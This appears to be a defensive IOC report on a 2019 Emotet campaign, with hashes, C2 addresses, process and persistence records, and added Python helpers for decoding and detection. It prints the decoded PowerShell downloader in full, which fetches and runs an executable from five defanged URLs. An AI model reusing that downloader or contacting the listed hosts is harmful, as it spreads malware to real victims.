
#emotet_150519

VRad    May 16th, 2019 (edited)
#IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
 
https://pastebin.com/F520pqQW
 
previous_contact:
28/01/19        https://pastebin.com/z2TDfM7s
23/01/18        https://pastebin.com/D9TDts5J
20/12/18        https://pastebin.com/EejcbL4t
04/12/18        https://pastebin.com/znQDtbnt
09/11/18        https://pastebin.com/THHMs2wg
01/10/18        https://pastebin.com/Y6DnbpHv
 
FAQ:
 
attack_vector
--------------
email attachment .doc > VBA macro > WMI (wmiprvse.exe) > powershell.exe -enc > GET, 5 URLs tried in turn until a download of at least 20603 bytes succeeds > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\<name>\<name>.exe (here eventssmall\eventssmall.exe)
 
email_headers
--------------
Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
Date: Wed, 15 May 2019 17:00:50 -0500
From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
To:  <user00@victim01>
Subject: RE: RE: Ціновий запит_комплектація для санвузла   [Ukrainian: "Price request_fittings for a bathroom"]
 
files
--------------
SHA-256     e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
File name   DATA-916228-2122097647.doc  [Composite Document File V2 Document, Application: Microsoft Office Word]
File size   145.13 KB (148608 bytes)
 
SHA-256     4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
File name   l4gktj_307970247.exe        [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   75 KB (76800 bytes)
 
activity
**************
macro_ps_b64_decoded:
--------------
$d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
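As an added triage helper (mine, not part of the original paste), the following Python decodes a `powershell.exe -enc` argument (base64 of UTF-16LE text, which is why the blob in the proc section below begins `JABkADcAN`, i.e. `$d7...`), pulls the payload URL list, the `-ge` size threshold and the drop file name out of the decoded downloader, and refangs the `[.] ` notation used in this paste. The embedded script is the one decoded above; all function names are my own.

```python
import base64
import re

# The downloader decoded above, copied verbatim with its "[.] " defanging, so the
# helper runs offline against the real sample (pieces are joined by Python's
# implicit string concatenation).
SAMPLE_SCRIPT = (
    r"$d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';"
    r"$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';"
    r"$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;"
    r"$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@"
    r"http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@"
    r"https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@"
    r"http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');"
    r"$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);"
    r"$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;"
    r"$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'"
)


def decode_enc(blob: str) -> str:
    """Decode a powershell.exe -enc/-EncodedCommand argument: base64 over UTF-16LE."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)  # logs often lose the trailing '=' padding
    return base64.b64decode(blob).decode("utf-16-le")


def encode_enc(script: str) -> str:
    """Inverse of decode_enc, handy for building test blobs and Sigma/YARA strings."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


DEFANG = re.compile(r"\s*[\[\{\(]\.[\]\}\)]\s*")  # "[.] ", "{.}", "(.)"


def refang(s: str) -> str:
    """Turn 'example[.] com' / 'hxxp://' back into a real URL."""
    s = DEFANG.sub(".", s)
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)


# Emotet keeps the URLs in one literal split on a separator: '...@...'.split('@')
SPLIT_LIST = re.compile(r"'([^']*)'\s*\.\s*split\s*\(\s*'(.)'\s*\)", re.I)
# Fallback scan; '@' is excluded so a still-joined list breaks apart anyway.
URL = re.compile(r"https?://[^\s'\"@]+", re.I)


def extract_urls(script: str) -> list:
    """Recover the payload URL list from the decoded downloader."""
    m = SPLIT_LIST.search(script)
    raw = m.group(1).split(m.group(2)) if m else URL.findall(refang(script))
    return [refang(u) for u in raw if u]


MIN_SIZE = re.compile(r"\.length\s*-ge\s*(\d+)", re.I)


def extract_min_size(script: str):
    """Byte count the download must reach before Invoke-Item is called."""
    m = MIN_SIZE.search(script)
    return int(m.group(1)) if m else None


def resolve_drop_name(script: str):
    """Resolve $env:userprofile+'\\'+$VAR+'.exe' by looking up $VAR's literal."""
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'(\.exe)'", script, re.I)
    if not m:
        return None
    var, ext = m.group(1), m.group(2)
    v = re.search(r"\$" + re.escape(var) + r"\s*=\s*'([^']*)'", script)
    return v.group(1) + ext if v else None


def triage(script: str) -> dict:
    """One-shot summary a responder can paste into a ticket."""
    return {
        "urls": extract_urls(script),
        "min_size": extract_min_size(script),
        "drop_name": resolve_drop_name(script),
    }


if __name__ == "__main__":
    blob = encode_enc(SAMPLE_SCRIPT)
    print("encoded prefix:", blob[:12])
    for k, v in triage(decode_enc(blob)).items():
        print(k, v)
```

The size check is worth keeping in the triage output: the downloader only runs the file if it is at least that many bytes, so a sinkholed or error-page response is silently skipped and the next URL is tried.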
  43.  
PL_SCR      5 / 5
--------------
http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
http://adsprout[.] co/wp/oMrTbPUxE/
http://springhelp[.] co[.] za/wp/jMSZNshHRf/
 
C2
--------------
78.188.7.213:8090
138.68.13.161:8080
 
netwrk
--------------
37.9.175.14     tomasoleksak[.] com    GET  /wp-includes/zm2ga7ha2l_5q8wl-2798/   HTTP/1.1                                         no User-Agent (!)
78.188.7.213    78.188.7.213:8090      POST /health/                              HTTP/1.1  (application/x-www-form-urlencoded)  Mozilla/4.0
138.68.13.161   138.68.13.161:8080     POST /loadan/enable/stubs/merge/           HTTP/1.1  (application/x-www-form-urlencoded)  Mozilla/4.0
 
comp
--------------
process          PID    proto  local       lport   remote           rport  state
powershell.exe   2632   TCP    localhost   49539   37.9.175.14      80     ESTABLISHED
eventssmall.exe  2108   TCP    localhost   49540   90.57.69.215     80     SYN_SENT
eventssmall.exe  2108   TCP    localhost   49542   191.92.69.115    80     SYN_SENT
eventssmall.exe  2108   TCP    localhost   49544   75.177.169.225   80     SYN_SENT
eventssmall.exe  2108   TCP    localhost   49546   78.188.7.213     8090   ESTABLISHED
eventssmall.exe  2108   TCP    localhost   49547   207.44.45.27     22     SYN_SENT
eventssmall.exe  2108   TCP    localhost   49548   138.68.13.161    8080   ESTABLISHED
 
proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
... [another context]
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
C:\Users\operator\206.exe
C:\Users\operator\206.exe --d4ba2bdd
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
 
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run      16.05.2019 11:08
    eventssmall    c:\users\operator\appdata\local\eventssmall\eventssmall.exe    03.09.2012 12:06
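An added detection sketch (mine, not from the paste) that turns the proc and persist observations above into checks over Sysmon-style process-creation events and Run-key values: encoded PowerShell whose parent is wmiprvse.exe, an executable started from the profile root, a self-named binary under %LOCALAPPDATA%, the `--<8 hex digits>` relaunch argument, and a Run value pointing at such a binary. The events are constructed from the proc/persist lines; parent images follow the chain the paste states, and the last event plus the OneDrive Run entry are benign controls that are not on the page.

```python
import ntpath
import re

# Constructed Sysmon-style process events built from the "proc" section above.
# ParentImage follows the stated chain (WMI > powershell > 206.exe > eventssmall.exe);
# the final event is a benign control that does not appear on the page.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "CommandLine": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN"},
    {"Image": r"C:\Users\operator\206.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\operator\206.exe --d4ba2bdd"},
    {"Image": r"C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe",
     "ParentImage": r"C:\Users\operator\206.exe",
     "CommandLine": r"C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

# Constructed HKCU\...\Run values: the one from "persist" plus a benign control.
RUN_ENTRIES = [
    ("eventssmall", r"c:\users\operator\appdata\local\eventssmall\eventssmall.exe"),
    ("OneDrive", r"C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s|$)", re.I)
# The dropped binary relaunches itself with an 8-hex-digit "--" argument (see proc above).
HEX_ARG = re.compile(r"(?:^|\s)--[0-9a-f]{8}(?=\s|$)", re.I)
# <drive>:\users\<user>\<file>.exe : an executable directly in the profile root (lower-cased input)
PROFILE_ROOT_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$")
# ...\appdata\local\<dir>\<dir>.exe : directory and file share a name (lower-cased input)
LOCALAPPDATA_SELF = re.compile(r"\\appdata\\local\\([^\\\s]+)\\\1\.exe(?=\s|$)")


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process(ev: dict) -> list:
    """Return the indicators one process-creation event matches (empty when clean)."""
    hits = []
    img = ev["Image"].lower()
    cmd = ev["CommandLine"]
    if base(img) == "powershell.exe" and base(ev["ParentImage"]) == "wmiprvse.exe" \
            and ENC_FLAG.search(cmd):
        hits.append("encoded PowerShell spawned by WMI provider host")
    if PROFILE_ROOT_EXE.match(img):
        hits.append("executable running from user profile root")
    if LOCALAPPDATA_SELF.search(img):
        hits.append("self-named executable under %LOCALAPPDATA%")
    if HEX_ARG.search(cmd):
        hits.append("8-hex-digit '--' argument (relaunch convention seen above)")
    return hits


def check_run_entry(name: str, value: str) -> bool:
    """True when a Run value starts a self-named binary under %LOCALAPPDATA%."""
    return LOCALAPPDATA_SELF.search(value.lower()) is not None


def triage(events=EVENTS, run_entries=RUN_ENTRIES) -> list:
    """(label, indicators) pairs for every event or Run value that matched."""
    out = []
    for ev in events:
        hits = check_process(ev)
        if hits:
            out.append((ntpath.basename(ev["Image"]), hits))
    for name, value in run_entries:
        if check_run_entry(name, value):
            out.append(("Run:" + name, ["self-named %LOCALAPPDATA% binary registered for autostart"]))
    return out


if __name__ == "__main__":
    for label, hits in triage():
        print(label, "->", "; ".join(hits))
```

Each check on its own is a weak signal (plenty of updaters live under %LOCALAPPDATA%), which is why the Run-key rule insists on the directory and file sharing a name and the PowerShell rule requires both the WMI parent and the encoded flag; the combination across one host is what makes this chain stand out.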
  89.  
drop
--------------
%temp%\VBE\
%temp%\Word8.0\MSForms.exd
C:\Users\operator\206.exe   [removed]
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
 
# # #
 
https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
 
VR